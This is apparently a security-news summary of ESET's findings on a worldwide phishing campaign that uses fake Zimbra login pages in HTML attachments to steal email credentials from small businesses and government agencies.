Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers
Researchers at ESET have identified a largescale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most targeted countries. The campaign does not appear to be targeted on any specific vertical.
Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update. The From field indicates the email has been sent by an email server administrator. The user is told that they need to download the HTML attachment, which will have a URL pointing to a local file patch. The HTML attachment includes the targeted organization’s logo, the organization’s name, and a fake login page, with the username prefilled. The user is only required to enter their password. If the password is entered, the credentials are transmitted by HTTPS POST request to an adversary-controlled server.
The ESET researchers observed waves of phishing emails being transmitted from some of the organizations targeted in the campaign which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the server. The researchers suggest that in these cases, the same password may have been used for email and administration. While this email campaign is not particularly sophisticated, it has proven to be effective. Since the HTML attachments contain legitimate code and only one link pointing to a malicious host, which is contained in the HTML rather than the message body, the emails may not be detected as malicious and are likely to bypass antispam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to determine which threat actor is behind the campaign.